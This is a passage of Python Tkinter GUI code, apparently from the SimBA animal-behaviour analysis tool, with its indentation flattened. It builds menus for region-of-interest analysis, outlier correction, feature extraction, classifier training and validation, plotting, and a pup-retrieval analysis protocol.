button_archivecsv = Button(label_archivecsv,text='Archive',command = lambda: archive_all_csvs(self.projectconfigini,archiveentrybox.entry_get))
#reverse identity
label_reverseID = LabelFrame(label_import,text='Reverse Tracking Identity',font=("Helvetica",12,'bold'), pady=5,padx=5,fg='black')
label_reverse_info = Label(label_reverseID,text='Note: This only works for 2 animals tracking')
label_git_reverse = Label(label_reverseID, text='[Click here to learn more about the reverse identity process]', cursor='hand2', fg='blue')
label_git_reverse.bind('<Button-1>', lambda e: webbrowser.open_new('https://github.com/sgoldenlab/simba/blob/master/docs/reverse_annotations.md'))
reverse_button = Button(label_reverseID,text='Reverse ID',command=self.reverseid)
#get coordinates
label_setscale = LabelFrame(tab3,text='Video parameters (fps, resolution, ppx/mm, etc.)', font=("Helvetica",12,'bold'), pady=5,padx=5,fg='black')
self.distanceinmm = Entry_Box(label_setscale, 'Known distance (mm)', '18')
button_setdistanceinmm = Button(label_setscale, text='Autopopulate table',command=lambda: self.set_distancemm(self.distanceinmm.entry_get))
button_setscale = Button(label_setscale,text='Set video parameters',command=lambda:video_info_table(self.projectconfigini))
#ROI
### define roi
self.roi_define = LabelFrame(tab6, text='Define ROI')
## rectangle
self.rec_entry = Entry_Box(self.roi_define, "# of rectangles", "12")
## circle
self.cir_entry = Entry_Box(self.roi_define, "# of circles", "12")
# polygons
self.pol_entry = Entry_Box(self.roi_define, "# of polygons", "12")
# button
showname = Button(self.roi_define, text="Show Shape Definitions Table", command= lambda:self.table(self.roi_define,self.rec_entry.entry_get,self.cir_entry.entry_get,self.pol_entry.entry_get))
# organize
self.roi_define.grid(row=0, sticky=N)
self.rec_entry.grid(row=1, sticky=W)
self.cir_entry.grid(row=2, sticky=W)
self.pol_entry.grid(row=3, sticky=W)
showname.grid(row=4,pady=10)
#load roi
self.loadroi = LabelFrame(tab6,text='Load ROI')
self.getentrybutton = Button(self.loadroi, text="Load defined ROI table", command=self.loaddefinedroi)
#organize
self.loadroi.grid(row=0,column=1,sticky=N)
self.getentrybutton.grid(row=0)
###analyze roi
self.roi_draw = LabelFrame(tab6, text='Analyze ROI')
# button
analyzeROI = Button(self.roi_draw, text='Analyze ROI data',command= lambda:self.roi_settings('Analyze ROI Data','not append'))
##organize
self.roi_draw.grid(row=0, column=2, sticky=N)
analyzeROI.grid(row=0)
###plot roi
self.roi_draw1 = LabelFrame(tab6, text='Visualize ROI')
# button
visualizeROI = Button(self.roi_draw1, text='Visualize ROI tracking', command=self.visualizeRoiTracking)
visualizeROIfeature = Button(self.roi_draw1, text='Visualize ROI features', command=self.visualizeROifeatures)
##organize
self.roi_draw1.grid(row=0, column=3, sticky=N)
visualizeROI.grid(row=0)
visualizeROIfeature.grid(row=1,pady=10)
#processmovementinroi (duplicate)
processmovementdupLabel = LabelFrame(tab6,text='Analyze distances/velocity')
button_process_movement1 = Button(processmovementdupLabel, text='Analyze distances/velocity',command=lambda: self.roi_settings('Analyze distances/velocity','processmovement'))
self.hmlvar = IntVar()
self.hmlvar.set(1)
button_hmlocation = Button(processmovementdupLabel,text='Create heat maps',command=lambda:self.run_roiAnalysisSettings(Toplevel(),self.hmlvar,'locationheatmap'))
button_timebins_M = Button(processmovementdupLabel,text='Time bins: Distance/velocity',command = lambda: self.timebin_ml("Time bins: Distance/Velocity",))
button_lineplot = Button(processmovementdupLabel, text='Generate path plot', command=self.quicklineplot)
button_analyzeDirection = Button(processmovementdupLabel,text='Analyze directionality between animals',command =lambda:directing_to_other_animals(self.projectconfigini) )
button_visualizeDirection = Button(processmovementdupLabel,text='Visualize directionality between animals',command=lambda:ROI_directionality_other_animals_visualize(self.projectconfigini))
#organize
processmovementdupLabel.grid(row=0,column=4,sticky=N)
button_process_movement1.grid(row=0)
button_hmlocation.grid(row=1)
button_timebins_M.grid(row=2)
button_lineplot.grid(row=3)
button_analyzeDirection.grid(row=4)
button_visualizeDirection.grid(row=5)
#outlier correction
label_outliercorrection = LabelFrame(tab4,text='Outlier correction',font=("Helvetica",12,'bold'),pady=5,padx=5,fg='black')
label_link = Label(label_outliercorrection,text='[link to description]',cursor='hand2',font='Verdana 10 underline')
button_settings_outlier = Button(label_outliercorrection,text='Settings',command = lambda: outlier_settings(self.projectconfigini))
button_outliercorrection = Button(label_outliercorrection,text='Run outlier correction',command=self.correct_outlier)
button_skipOC = Button(label_outliercorrection,text='Skip outlier correction (CAUTION)',fg='red', command=lambda:skip_outlier_c(self.projectconfigini))
label_link.bind("<Button-1>",lambda e: self.callback('https://github.com/sgoldenlab/simba/blob/master/misc/Outlier_settings.pdf'))
#extract features
label_extractfeatures = LabelFrame(tab5,text='Extract Features',font=("Helvetica",12,'bold'),pady=5,padx=5,fg='black')
button_extractfeatures = Button(label_extractfeatures,text='Extract Features',command = lambda: threading.Thread(target=self.extractfeatures).start())
def activate(box, *args):
for entry in args:
if box.get() == 0:
entry.configure(state='disabled')
elif box.get() == 1:
entry.configure(state='normal')
labelframe_usrdef = LabelFrame(label_extractfeatures)
self.scriptfile = FileSelect(labelframe_usrdef, 'Script path')
self.scriptfile.btnFind.configure(state='disabled')
self.usVar = IntVar()
userscript = Checkbutton(labelframe_usrdef,text='Apply user defined feature extraction script',variable=self.usVar,command=lambda:activate(self.usVar,self.scriptfile.btnFind))
#roiappend
appendDf = Button(label_extractfeatures, text='Append ROI data to features (CAUTION)', fg='red', command=self.appendroisettings)
appendDf.grid(row=10,pady=10)
#label Behavior
label_labelaggression = LabelFrame(tab7,text='Label Behavior',font=("Helvetica",12,'bold'),pady=5,padx=5,fg='black')
button_labelaggression = Button(label_labelaggression, text='Select video (create new video annotation)',command= lambda:choose_folder(self.projectconfigini))
button_load_labelaggression = Button(label_labelaggression,text='Select video (continue existing video annotation)',command= lambda: load_folder(self.projectconfigini))
#third party annotation
label_thirdpartyann = LabelFrame(tab7,text='Import Third-Party behavior labels',font=("Helvetica",12,'bold'),pady=5,padx=5,fg='black')
button_importmars = Button(label_thirdpartyann,text='Import MARS Annotation (select folder with .annot files)',command=self.importMARS)
button_importboris = Button(label_thirdpartyann,text='Import Boris Annotation (select folder with .csv files)',command = self.importBoris)
button_importsolomon = Button(label_thirdpartyann,text='Import Solomon Annotation (select folder with .csv files',command = self.importSolomon)
#pseudolabel
label_pseudo = LabelFrame(tab7,text='Pseudo Labelling',font=("Helvetica",12,'bold'),pady=5,padx=5,fg='black')
pLabel_framedir = FileSelect(label_pseudo,'Video Path',lblwidth='10')
plabelframe_threshold = LabelFrame(label_pseudo,text='Threshold',pady=5,padx=5)
plabel_threshold =[0]*len(targetlist)
count=0
for i in list(targetlist):
plabel_threshold[count] = Entry_Box(plabelframe_threshold,str(i),'20')
plabel_threshold[count].grid(row=count+2,sticky=W)
count+=1
pLabel_button = Button(label_pseudo,text='Correct label',command = lambda:semisuperviseLabel(self.projectconfigini,pLabel_framedir.file_path,list(targetlist),plabel_threshold))
#train machine model
label_trainmachinemodel = LabelFrame(tab8,text='Train Machine Models',font=("Helvetica",12,'bold'),padx=5,pady=5,fg='black')
button_trainmachinesettings = Button(label_trainmachinemodel,text='Settings',command=self.trainmachinemodelsetting)
button_trainmachinemodel = Button(label_trainmachinemodel,text='Train single model from global environment',fg='blue',command = lambda: threading.Thread(target=trainmodel2(self.projectconfigini)).start())
button_train_multimodel = Button(label_trainmachinemodel, text='Train multiple models, one for each saved settings',fg='green',command = lambda: threading.Thread(target=self.trainmultimodel).start())
##Single classifier valid
label_model_validation = LabelFrame(tab9, text='Validate Model on Single Video', pady=5, padx=5,
font=("Helvetica", 12, 'bold'), fg='black')
self.csvfile = FileSelect(label_model_validation, 'Select features file',
title='Select .csv file in /project_folder/csv/features_extracted')
self.modelfile = FileSelect(label_model_validation, 'Select model file ', title='Select the model (.sav) file')
button_runvalidmodel = Button(label_model_validation, text='Run Model',command=lambda: validate_model_one_vid_1stStep(self.projectconfigini,self.csvfile.file_path,self.modelfile.file_path))
button_generateplot = Button(label_model_validation, text="Generate plot", command=self.updateThreshold)
self.dis_threshold = Entry_Box(label_model_validation, 'Discrimination threshold', '28')
self.min_behaviorbout = Entry_Box(label_model_validation, 'Minimum behavior bout length (ms)', '28')
self.ganttvar = IntVar()
self.generategantt = Checkbutton(label_model_validation,text='Generate Gantt plot',variable=self.ganttvar)
button_validate_model = Button(label_model_validation, text='Validate', command=self.validatemodelsinglevid)
#run machine model
label_runmachinemodel = LabelFrame(tab9,text='Run Machine Model',font=("Helvetica",12,'bold'),padx=5,pady=5,fg='black')
button_run_rfmodelsettings = Button(label_runmachinemodel,text='Model Settings',command=self.modelselection)
# self.descrimination_threshold = Entry_Box(label_runmachinemodel,'Discrimination threshold','28')
# self.shortest_bout = Entry_Box(label_runmachinemodel,'Minimum behavior bout length (ms)','28')
button_runmachinemodel = Button(label_runmachinemodel,text='Run RF Model',command = self.runrfmodel)
#kleinberg smoothing
kleinberg_button = Button(label_runmachinemodel,text='Kleinberg Smoothing',command = self.kleinbergMenu)
#FSTTC
fsttc_button = Button(label_runmachinemodel,text='FSTTC',command=self.fsttcmenu)
# machine results
label_machineresults = LabelFrame(tab9,text='Analyze Machine Results',font=("Helvetica",12,'bold'),padx=5,pady=5,fg='black')
button_process_datalog = Button(label_machineresults,text='Analyze machine predictions',command =self.analyzedatalog)
button_process_movement = Button(label_machineresults,text='Analyze distances/velocity',command=lambda:self.roi_settings('Analyze distances/velocity',
'processmovement'))
button_movebins = Button(label_machineresults,text='Time bins: Distance/velocity',command=lambda:self.timebinmove('mov'))
button_classifierbins = Button(label_machineresults,text='Time bins: Machine predictions',command=lambda:self.timebinmove('classifier'))
label_severity = LabelFrame(tab9,text='Analyze Severity',font=("Helvetica",12,'bold'),padx=5,pady=5,fg='black')
self.severityscale = Entry_Box(label_severity,'Severity scale 0 -',15)
self.severityTarget = DropDownMenu(label_severity,'Target',targetlist,'15')
self.severityTarget.setChoices(targetlist[(config.get('SML settings', 'target_name_' + str(1)))])
button_process_severity = Button(label_severity,text='Analyze target severity',command=self.analyzseverity)
#plot sklearn res
label_plotsklearnr = LabelFrame(tab10,text='Sklearn visualization',font=("Helvetica",12,'bold'),pady=5,padx=5,fg='black')
#lbl prob threshold
lbl_probthreshold = LabelFrame(label_plotsklearnr,text='Body-part probability threshold',font=("Helvetica",12,'bold'),padx=5,pady=5,fg='black')
lbl_thresexplain = Label(lbl_probthreshold,text='Bodyparts below the set threshold won\'t be shown in the output.')
self.bpthres = Entry_Box(lbl_probthreshold,'Body-part probability threshold','32')
bpthresbutton = Button(lbl_probthreshold,text='Save threshold',command= self.savethres)
#set bp threshold
try:
thres = config.get('threshold_settings', 'bp_threshold_sklearn')
self.bpthres.entry_set(str(thres))
except:
self.bpthres.entry_set(0.0)
#all videos
label_skv_all = LabelFrame(label_plotsklearnr,text='Apply to all videos',font=("Helvetica",12,'bold'),pady=5,padx=5,fg='black')
self.videovar = IntVar()
self.genframevar = IntVar()
videocheck = Checkbutton(label_skv_all,text='Generate video',variable=self.videovar)
framecheck = Checkbutton(label_skv_all,text='Generate frame',variable=self.genframevar)
button_plotsklearnr = Button(label_skv_all,text='Visualize classification results',command =self.plotsklearn_result)
#single video
label_skv_single = LabelFrame(label_plotsklearnr, text='Apply to single video', font=("Helvetica", 12, 'bold'),pady=5, padx=5, fg='black')
videodir_ = os.path.join(os.path.dirname(self.projectconfigini), 'videos')
vid_list_ =[]
for i in os.listdir(videodir_):
if i.endswith(('.avi','.mp4','.mov','flv','m4v')):
vid_list_.append(i)
if not vid_list_:
vid_list_.append('No videos found')
self.video_entry = DropDownMenu(label_skv_single, 'Select video', vid_list_, '15')
self.video_entry.setChoices(vid_list_[0])
self.videovar2 = IntVar()
self.genframevar2 = IntVar()
videocheck2 = Checkbutton(label_skv_single, text='Generate video', variable=self.videovar2)
framecheck2 = Checkbutton(label_skv_single, text='Generate frame', variable=self.genframevar2)
button_plotsklearnr2 = Button(label_skv_single, text='Visualize classification results',command=lambda: plotsklearnresultsingle(self.projectconfigini,self.videovar2.get(),self.genframevar2.get(),self.video_entry.getChoices()))
#plotpathing
label_plotall = LabelFrame(tab10,text='Visualizations',font=("Helvetica",12,'bold'),pady=5,padx=5,fg='black')
#ganttplot
label_ganttplot = LabelFrame(label_plotall,text='Gantt plot',pady=5,padx=5)
button_ganttplot = Button(label_ganttplot,text='Generate gantt plot',command= lambda: ganntplot_config(self.projectconfigini))
#dataplot
label_dataplot = LabelFrame(label_plotall, text='Data plot', pady=5, padx=5)
if pose_config_setting == 'user_defined':
self.SelectedBp = DropDownMenu(label_dataplot, 'Select body part', bp_set, '15')
self.SelectedBp.setChoices((bp_set)[0])
button_dataplot = Button(label_dataplot, text='Generate data plot', command=self.plotdataplot)
#path plot
label_pathplot = LabelFrame(label_plotall,text='Path plot',pady=5,padx=5)
self.Deque_points = Entry_Box(label_pathplot,'Max lines','15')
self.severity_brackets = Entry_Box(label_pathplot,'Severity Scale: 0 - ','15')
self.noofAnimal = DropDownMenu(label_pathplot,'Number of animals',[1,2],'15')
self.noofAnimal.setChoices(1)
confirmAnimals = Button(label_pathplot,text='Confirm',command=lambda:self.tracknoofanimal(label_pathplot,bp_set))
self.plotsvvar = IntVar()
checkboxplotseverity = Checkbutton(label_pathplot,text='plot_severity',variable=self.plotsvvar)
self.severityTargetpp = DropDownMenu(label_pathplot, 'Target', targetlist, '15')
self.severityTargetpp.setChoices(targetlist[(config.get('SML settings', 'target_name_' + str(1)))])
button_pathplot = Button(label_pathplot,text='Generate Path plot',command=self.pathplotcommand)
CreateToolTip(self.Deque_points,'Maximum number of path lines in deque list')
# CreateToolTip(self.Bodyparts, 'If golden aggression config: Nose, Left ear, Right ear, Centroid, Left lateral, Right lateral, Tail base, Tail end')
CreateToolTip(self.severity_brackets,'Set number of brackets to severity measures')
#distanceplot
label_distanceplot = LabelFrame(label_plotall,text='Distance plot',pady=5,padx=5)
self.poi1 = DropDownMenu(label_distanceplot,'Body part 1',bp_set,'15')
self.poi2 = DropDownMenu(label_distanceplot,'Body part 2',bp_set,'15')
#set choice
self.poi1.setChoices((bp_set)[0])
self.poi2.setChoices((bp_set)[len(bp_set)//2])
button_distanceplot= Button(label_distanceplot,text='Generate Distance plot',command=self.distanceplotcommand)
CreateToolTip(self.poi1,'The bodyparts from config yaml. eg: Ear_left_1,Ear_right_1,Nose_1,Center_1,Lateral_left_1,Lateral_right_1,Tail_base_1,Tail_end_1,Ear_left_2,Ear_right_2,Nose_2,Center_2,Lateral_left_2,Lateral_right_2,Tail_base_2,Tail_end_2')
#Heatplot
label_heatmap = LabelFrame(label_plotall, text='Heatmap', pady=5, padx=5)
self.BinSize = Entry_Box(label_heatmap, 'Bin size (mm)', '15')
self.MaxScale = Entry_Box(label_heatmap, 'max', '15')
hmchoices = {'viridis','plasma','inferno','magma','jet','gnuplot2'}
self.hmMenu = DropDownMenu(label_heatmap,'Color Palette',hmchoices,'15')
self.hmMenu.setChoices('jet')
#get target called on top
self.targetMenu = DropDownMenu(label_heatmap,'Target',targetlist,'15')
self.targetMenu.setChoices(targetlist[(config.get('SML settings','target_name_'+str(1)))])
#bodyparts
bpOptionListofList = define_bp_drop_down(configini)
print(bpOptionListofList)
bpoptions = [val for sublist in bpOptionListofList for val in sublist]
self.bp1 = DropDownMenu(label_heatmap,'Bodypart',bpoptions,'15')
self.bp1.setChoices(bpoptions[0])
self.intimgvar = IntVar()
lstimg = Checkbutton(label_heatmap,text='Save last image only (if unticked heatmap videos are created)',variable=self.intimgvar)
button_heatmap = Button(label_heatmap, text='Generate heatmap', command=self.heatmapcommand)
#plot threshold
label_plotThreshold = LabelFrame(label_plotall,text='Plot Threshold',pady=5,padx=5)
self.behaviorMenu = DropDownMenu(label_plotThreshold,'Target',targetlist,'15')
self.behaviorMenu.setChoices(targetlist[(config.get('SML settings','target_name_'+str(1)))])
plotThresholdButton = Button(label_plotThreshold,text='Plot threshold',command=lambda:plot_threshold(self.projectconfigini,self.behaviorMenu.getChoices()))
#Merge frames
label_mergeframes = LabelFrame(tab10, text='Merge frames', pady=5, padx=5, font=("Helvetica", 12, 'bold'), fg='black')
# use for loop to create intvar
mergeFramesvar = []
for i in range(7):
mergeFramesvar.append(IntVar())
# use loop to create checkbox?
mfCheckbox = [0] * 7
mfTitlebox = ['Sklearn', 'Gantt', 'Path', "'Live' data", 'Distance','Probability']
for i in range(6):
mfCheckbox[i] = Checkbutton(label_mergeframes, text=mfTitlebox[i], variable=mergeFramesvar[i])
mfCheckbox[i].grid(row=i, sticky=W)
button_mergeframe = Button(label_mergeframes,text='Merge frames',command= lambda:self.mergeframesofplot(mergeFramesvar))
#Plotly
plotlyInterface = LabelFrame(tab10, text= 'Plotly / Dash', font=("Helvetica", 12, 'bold'), pady=5, padx=5, fg='black')
plotlyInterfaceTitles = ['Sklearn results', 'Time bin analyses', 'Probabilities', 'Severity analysis']
toIncludeVar = []
for i in range(len(plotlyInterfaceTitles)+1):
toIncludeVar.append(IntVar())
plotlyCheckbox = [0] * (len(plotlyInterfaceTitles)+1)
for i in range(len(plotlyInterfaceTitles)):
plotlyCheckbox[i] = Checkbutton(plotlyInterface, text=plotlyInterfaceTitles[i], variable=toIncludeVar[i])
plotlyCheckbox[i].grid(row=i, sticky=W)
button_save_plotly_file = Button(plotlyInterface, text='Save SimBA / Plotly dataset', command=lambda: self.generateSimBPlotlyFile(toIncludeVar))
self.plotly_file = FileSelect(plotlyInterface, 'SimBA Dashboard file (H5)', title='Select SimBA/Plotly dataset (h5)')
self.groups_file = FileSelect(plotlyInterface, 'SimBA Groups file (CSV)', title='Select groups file (csv')
button_open_plotly_interface = Button(plotlyInterface, text='Open SimBA / Plotly dataset', fg='black', command=lambda: [self.open_plotly_interface('http://127.0.0.1:8050')])
## classifier validation
label_classifier_validation = LabelFrame(tab11, text='Classifier Validation', pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
self.seconds = Entry_Box(label_classifier_validation,'Seconds','8')
self.cvTarget = DropDownMenu(label_classifier_validation,'Target',targetlist,'15')
self.cvTarget.setChoices(targetlist[(config.get('SML settings', 'target_name_' + str(1)))])
button_validate_classifier = Button(label_classifier_validation,text='Validate',command =self.classifiervalidation)
# ## Live classification
# label_deeplabstream = LabelFrame(tab12, text='DeepLabStream', pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
# self.label_settingsini = FolderSelect(label_deeplabstream, 'Select DLS folder',title='Select DeepLabStream folder')
# button_dlsconfirm = Button(label_deeplabstream,text='Confirm', command = self.DLSsettings)
#addons
lbl_addon = LabelFrame(tab12,text='SimBA Expansions',pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
button_bel = Button(lbl_addon,text='Pup retrieval - Analysis Protocol 1',command = self.pupMenu)
#organize
label_import.grid(row=0,column=0,sticky=W,pady=5)
self.label_import_csv.grid(row=2, sticky=N + W, pady=5)
filetype.grid(row=0,sticky=W)
self.frame.grid(row=3,sticky=W)
label_multicsvimport.grid(row=1, sticky=W)
self.folder_csv.grid(row=0, sticky=W)
button_import_csv.grid(row=1, sticky=W)
label_singlecsvimport.grid(row=2, sticky=W)
self.file_csv.grid(row=0, sticky=W)
button_importsinglecsv.grid(row=1, sticky=W)
label_importvideo.grid(row=0,column=0, sticky=N+W, pady=5,padx=5,rowspan=2)
label_multivideoimport.grid(row=0, sticky=W)
self.multivideofolderpath.grid(row=0, sticky=W)
self.video_type.grid(row=1, sticky=W)
button_multivideoimport.grid(row=2, sticky=W)
label_singlevideoimport.grid(row=1, sticky=W)
self.singlevideopath.grid(row=0, sticky=W)
button_importsinglevideo.grid(row=1, sticky=W)
label_extractframes.grid(row=0,column=1,sticky=N+W,pady=5,padx=5)
button_extractframes.grid(row=0,sticky=W)
label_importframefolder.grid(row=1,column=1,sticky=N+W,pady=5,padx=5,rowspan=2)
self.frame_folder.grid(row=0,sticky=W)
button_importframefolder.grid(row=1,sticky=W)
#
label_reverseID.grid(row=2,column=1,sticky=N+W,pady=5,padx=5)
label_reverse_info.grid(row=0,sticky=W)
label_git_reverse.grid(row=1,sticky=W)
reverse_button.grid(row=2,sticky=W,pady=5)
label_newclassifier.grid(row=0,column=2,sticky=N+W,pady=5,padx=5)
self.classifierentry.grid(row=0,column=0,sticky=W)
button_addclassifier.grid(row=1,column=0,sticky=W)
label_removeclassifier.grid(row=1,column=2,sticky=N+W,pady=5,padx=5)
button_removeclassifier.grid(row=0)
label_archivecsv.grid(row=2,column=2,sticky=W,pady=5,padx=5)
archiveentrybox.grid(row=0)
button_archivecsv.grid(row=1,pady=10)
label_setscale.grid(row=2,sticky=W,pady=5,padx=5)
self.distanceinmm.grid(row=0,column=0,sticky=W)
button_setdistanceinmm.grid(row=0,column=1)
button_setscale.grid(row=1,column=0,sticky=W)
label_outliercorrection.grid(row=0,sticky=W)
label_link.grid(row=0,sticky=W)
button_settings_outlier.grid(row=1,sticky=W)
button_outliercorrection.grid(row=3,sticky=W)
button_skipOC.grid(row=4,sticky=W,pady=5)
label_extractfeatures.grid(row=4,sticky=W)
button_extractfeatures.grid(row=0,sticky=W)
labelframe_usrdef.grid(row=1,sticky=W,pady=5)
userscript.grid(row=1,sticky=W)
self.scriptfile.grid(row=2,sticky=W)
label_labelaggression.grid(row=5,sticky=W)
button_labelaggression.grid(row=0,sticky=W)
button_load_labelaggression.grid(row=1,sticky=W,pady=10)
label_pseudo.grid(row=6,sticky=W,pady=10)
pLabel_framedir.grid(row=0,sticky=W)
plabelframe_threshold.grid(row=2,sticky=W)
pLabel_button.grid(row=3,sticky=W)
label_thirdpartyann.grid(row=7, sticky=W)
button_importmars.grid(row=0, sticky=W)
button_importboris.grid(row=1,sticky=W,pady=10)
button_importsolomon.grid(row=2,sticky=W,pady=2)
label_trainmachinemodel.grid(row=6,sticky=W)
button_trainmachinesettings.grid(row=0,column=0,sticky=W,padx=5)
button_trainmachinemodel.grid(row=0,column=1,sticky=W,padx=5)
button_train_multimodel.grid(row=0,column=2,sticky=W,padx=5)
label_model_validation.grid(row=7, sticky=W, pady=5)
self.csvfile.grid(row=0, sticky=W)
self.modelfile.grid(row=1, sticky=W)
button_runvalidmodel.grid(row=2, sticky=W)
button_generateplot.grid(row=3, sticky=W)
self.dis_threshold.grid(row=4, sticky=W)
self.min_behaviorbout.grid(row=5, sticky=W)
self.generategantt.grid(row=6,sticky=W)
button_validate_model.grid(row=7, sticky=W)
label_runmachinemodel.grid(row=8,sticky=W,pady=5)
button_run_rfmodelsettings.grid(row=0,sticky=W)
# self.descrimination_threshold.grid(row=1,sticky=W)
# button_set_d_t.grid(row=1,column=1,sticky=W)
# self.shortest_bout.grid(row=2,column=0,sticky=W)
# button_set_shortbout.grid(row=2,column=1,sticky=W)
button_runmachinemodel.grid(row=1,sticky=W,pady=5)
kleinberg_button.grid(row=2,sticky=W,pady=10)
fsttc_button.grid(row=3,sticky=W,pady=10)
label_machineresults.grid(row=9,sticky=W,pady=5)
button_process_datalog.grid(row=2,column=0,sticky=W,padx=3)
button_process_movement.grid(row=2,column=1,sticky=W,padx=3)
button_movebins.grid(row=3,column=1,sticky=W,padx=3)
button_classifierbins.grid(row=3,column=0,sticky=W,padx=3)
#severity
label_severity.grid(row=10,sticky=W,pady=5)
self.severityscale.grid(row=0,sticky=W)
self.severityTarget.grid(row=1,sticky=W)
button_process_severity.grid(row=2,sticky=W,pady=8)
label_plotsklearnr.grid(row=11,column=0,sticky=W+N,padx=5)
lbl_probthreshold.grid(row=0,sticky=W,padx=5,pady=10)
lbl_thresexplain.grid(row=0,sticky=W)
self.bpthres.grid(row=1,sticky=E)
bpthresbutton.grid(row=2,padx=5,pady=10)
label_skv_all.grid(row=1,sticky=W,padx=5,pady=10)
videocheck.grid(row=0,sticky=W)
framecheck.grid(row=1,sticky=W)
button_plotsklearnr.grid(row=2,sticky=W)
label_skv_single.grid(row=2,sticky=W,pady=10,padx=5)
self.video_entry.grid(row=0,sticky=W)
videocheck2.grid(row=1,sticky=W)
framecheck2.grid(row=2,sticky=W)
button_plotsklearnr2.grid(row=3,sticky=W)
label_plotall.grid(row=11,column=1,sticky=W+N,padx=5)
#gantt
label_ganttplot.grid(row=0,sticky=W)
button_ganttplot.grid(row=0,sticky=W)
#data
label_dataplot.grid(row=1,sticky=W)
if pose_config_setting == 'user_defined':
self.SelectedBp.grid(row=1, sticky=W)
button_dataplot.grid(row=2, sticky=W)
#path
label_pathplot.grid(row=2,sticky=W)
self.Deque_points.grid(row=0,sticky=W)
self.severity_brackets.grid(row=2,sticky=W)
self.noofAnimal.grid(row=3,sticky=W)
confirmAnimals.grid(row=3,column=1,sticky=W)
checkboxplotseverity.grid(row=7,sticky=W)
self.severityTargetpp.grid(row=8,sticky=W)
button_pathplot.grid(row=9,sticky=W)
#distance
label_distanceplot.grid(row=3,sticky=W)
self.poi1.grid(row=1,sticky=W)
self.poi2.grid(row=2,sticky=W)
button_distanceplot.grid(row=3,sticky=W)
#heat
label_heatmap.grid(row=4, sticky=W)
self.BinSize.grid(row=0, sticky=W)
self.MaxScale.grid(row=1, sticky=W)
self.hmMenu.grid(row=3,sticky=W)
self.targetMenu.grid(row=4,sticky=W)
self.bp1.grid(row=5,sticky=W)
lstimg.grid(row=6,sticky=W)
button_heatmap.grid(row=7, sticky=W)
#threshold
label_plotThreshold.grid(row=5, sticky=W)
self.behaviorMenu.grid(row=0, sticky=W)
self.behaviorMenu.grid(row=1, sticky=W)
plotThresholdButton.grid(row=2, sticky=W)
label_mergeframes.grid(row=11,column=2,sticky=W+N,padx=5)
button_mergeframe.grid(row=10,sticky=W)
plotlyInterface.grid(row=11, column=3, sticky=W + N, padx=5)
button_save_plotly_file.grid(row=10, sticky=W)
self.plotly_file.grid(row=11, sticky=W)
self.groups_file.grid(row=12, sticky=W)
button_open_plotly_interface.grid(row=13, sticky=W)
label_classifier_validation.grid(row=14,sticky=W)
self.seconds.grid(row=0,sticky=W)
self.cvTarget.grid(row=1,sticky=W)
button_validate_classifier.grid(row=2,sticky=W)
lbl_addon.grid(row=15,sticky=W)
button_bel.grid(row=0,sticky=W)
# label_deeplabstream.grid(row=15,sticky=W)
# self.label_settingsini.grid(row=0,sticky=W)
# button_dlsconfirm.grid(row=1,pady=5)
def reverseid(self):
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
noanimal = int(config.get('General settings','animal_no'))
if noanimal ==2:
reverse_dlc_input_files(self.projectconfigini)
else:
print('This only works if you have exactly 2 animals in your tracking data and video.')
def savethres(self):
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
config.set('threshold_settings', 'bp_threshold_sklearn',str(self.bpthres.entry_get))
with open(self.projectconfigini, 'w') as configfile:
config.write(configfile)
print('Threshold saved >>', str(self.bpthres.entry_get))
def pupMenu(self):
#top lvl
config = ConfigParser()
configFile = str(self.projectconfigini)
config.read(configFile)
try:
multi_animal_IDs = config.get('Multi animal IDs', 'id_list').split(',')
except (NoSectionError, NoOptionError):
multi_animal_IDs = ['1_mother', ' 2_pup']
if len(multi_animal_IDs) != 2:
multi_animal_IDs = ['1_mother', ' 2_pup']
puptoplvl = Toplevel()
puptoplvl.minsize(400,320)
puptoplvl.wm_title('Pup retrieval - Analysis Protocol 1')
#lblframe for input
lbl_pup = LabelFrame(puptoplvl,text='Pup retrieval - Analysis Protocol 1', pady=5, padx=5,font=("Helvetica",12,'bold'),fg='black')
prob_pup = Entry_Box(lbl_pup,'Tracking probability (pup)','20')
prob_pup.entry_set(0.025)
prob_mom = Entry_Box(lbl_pup,'Tracking probability (dam)','20')
prob_mom.entry_set(0.5)
dist_start = Entry_Box(lbl_pup, 'Start distance criterion (mm)', '20')
dist_start.entry_set(80)
carry_frames_seconds = Entry_Box(lbl_pup, 'Carry frames (s)', '20')
carry_frames_seconds.entry_set(3)
corenest_name = Entry_Box(lbl_pup, 'Core-nest name', '20')
corenest_name.entry_set('corenest')
nest_name = Entry_Box(lbl_pup, 'Nest name', '20')
nest_name.entry_set('nest')
dam_name = Entry_Box(lbl_pup, 'Dam name', '20')
dam_name.entry_set(multi_animal_IDs[0])
pup_name = Entry_Box(lbl_pup, 'Pup name', '20')
pup_name.entry_set(multi_animal_IDs[1])
smooth_function = Entry_Box(lbl_pup, 'Smooth function', '20')
smooth_function.entry_set('gaussian')
smooth_factor = Entry_Box(lbl_pup, 'Smooth factor', '20')
smooth_factor.entry_set(5)
max_time = Entry_Box(lbl_pup, 'Max time (s)', '20')
max_time.entry_set(90)
carry_classifier_name = Entry_Box(lbl_pup, 'Carry classifier name', '20')
carry_classifier_name.entry_set('carry')
approach_classifier_name = Entry_Box(lbl_pup, 'Approach classifier name', '20')
approach_classifier_name.entry_set('approach')
dig_classifier_name = Entry_Box(lbl_pup, 'Dig classifier name', '20')
dig_classifier_name.entry_set('doggy')
#button
button_run = Button(puptoplvl,text='RUN',font=("Helvetica",12,'bold'),fg='red',command= lambda: pup_retrieval_1(self.projectconfigini, float(prob_pup.entry_get), float(prob_mom.entry_get), float(dist_start.entry_get), float(carry_frames_seconds.entry_get), float(smooth_factor.entry_get), corenest_name.entry_get, nest_name.entry_get, dam_name.entry_get, pup_name.entry_get, smooth_function.entry_get, int(max_time), carry_classifier_name.entry_get, approach_classifier_name.entry_get, dig_classifier_name.entry_get))
#organize
lbl_pup.grid(row=0,sticky=W)
prob_pup.grid(row=0,sticky=W)
prob_mom.grid(row=1,sticky=W)
dist_start.grid(row=2,sticky=W)
carry_frames_seconds.grid(row=4,sticky=W)
corenest_name.grid(row=5,sticky=W)
nest_name.grid(row=6,sticky=W)
dam_name.grid(row=7,sticky=W)
pup_name.grid(row=8,sticky=W)
smooth_function.grid(row=9, sticky=W)
smooth_factor.grid(row=10, sticky=W)
max_time.grid(row=11, sticky=W)
